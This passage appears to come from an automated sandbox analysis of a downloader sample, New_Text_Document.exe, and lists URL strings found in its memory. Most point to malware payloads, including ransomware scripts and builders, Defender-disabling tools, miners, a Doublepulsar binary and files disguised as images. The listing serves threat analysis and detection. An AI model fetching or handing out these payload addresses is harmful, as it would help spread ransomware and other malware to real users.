                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pns.org.pk/crt/xe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pouya.blob.core.windows.net/test/test.exe
                    Source: explorer.exe, 0000000C.00000000.1312346993.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.2526916593.000000000C091000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://powerpoint.office.com
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ppfatahillah.com/cc.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://predubai.com/el/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://primusth.com/impresa/Agenzia.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://primusth.com/impresa/AgenziaEntrate.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://primusth.com/impresa/Direzione.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://primusth.com/impresa/Marzo.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://primusth.com/impresa/cliente.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://primusth.com/impresa/impresa.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://propagandaetrafego.com/b.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://qcollect.co.za/tauu/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://quickcheckx.github.io/quickme/KmJiw22.bin
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://quickie.com.do/qs/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://quizbn.com/download/File_pass1234.7z
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://radiola93.com/uaum/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ratnavalijewels.com/iiu/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/BeRo1985/berotinypascal/e34bd4164f4b7c27e7cf667dffd9274d33d6dfbe/b
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/BlackWhite555/123/main/123.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/E-x-o-d-u-s/RansomWare-Exodus/main/Ransomware-Exodus.ps1
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Elder4Ever/Powershell/main/Ransom/Invoke-Ransom.ps1
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Evil-coder66/DefenderControl/main/DefenderControl.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/EvilHuntersProject/Launcher/main/Evil_Launcher_Beta-win_x64.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/FaridMohammed/WinLockerBuilderv5/main/WinlockerBuilderv5.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/HelloXSploit/OTTE-LOCKER/main/Otte-Locker.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Realtek25556/rhti2/gh-pages/90hfnvo69vk2ot.bmp
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Smug246/luna-injection/main/obfuscated-injection.js
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/SoftwateHub/assa/main/heaoyam78.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Victor220291/ransomcreator/master/ransom_builder.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/arntsonl/calc_security_poc/master/dll/calc.dll
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/arturLe1/mainrasenupmbuilgdive/main/l.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/drax2020/drax/main/anykmc.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/drax2020/drax/main/invkmc.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/duantienty/client/main/Client2.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/duantienty/miner/main/Client.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/duantienty/miner/main/Jcojp.jpg
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/fuzzbunch/fuzzbunch/master/payloads/Doublepulsar-1.3.1.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/hrgerge/tsestoi3n4g/main/J.bat
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/inheritancehope401/ce/main/6.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/lacasitamx/INSTALADOR-X/master/LACASITA/LACASITA.sh
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/macigaiga/cstest/master/cs_maltest.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/paulx1x9/vid/main/build.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/swagkarna/Bypass-Tamper-Protection/main/NSudo.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/xanaxgang/yea-i-do-them-drugz/main/mnr/prig.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/xanaxgang/yea-i-do-them-drugz/main/mnr/xm.txt
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rawdah-mlhm.com/uqe/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://records.dennisign.se/agenzia/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://records.dennisign.se/connect/
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://records.dennisign.se/scarica/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://region1.google-analytics.com:443
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://relaxindulge.co.nz/bbsc7ejpd.rar
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://resourceedge.org/new.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://richterhi-tech.com/be/service/j__1_.png
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://riser360.com.mx/talu/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rjassociatesindia.com/sitn/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rockedcme.com/equ/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rocknetwork.org/ul/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rocknetwork.org/ul/?03965141
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rollsbeer.com/mise/Cliente.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rollsbeer.com/mise/Disposizioni.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2512413594.0000000013321000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rollsbeer.com/mise/Servizi.zip
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rootsivyintschools.edu.pk/na/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.0000000003621000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://rsbudikemuliaan.id/tuss/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sangfor-udpate.oss-cn-beijing.aliyuncs.com/f275bf12/update.exe
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://santaritasjc.org.br/nte/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000035DA000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sattamatka-no.com/sar/
                    Source: New_Text_Document.exe, 00000000.00000002.2491308945.00000000033D7000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2512413594.0000000013341000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000035F3000.00000004.00000800.00020000.00000000.sdmp, New_Text_Document.exe, 00000000.00000002.2491308945.00000000033FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://scproducts.co.za/adis/
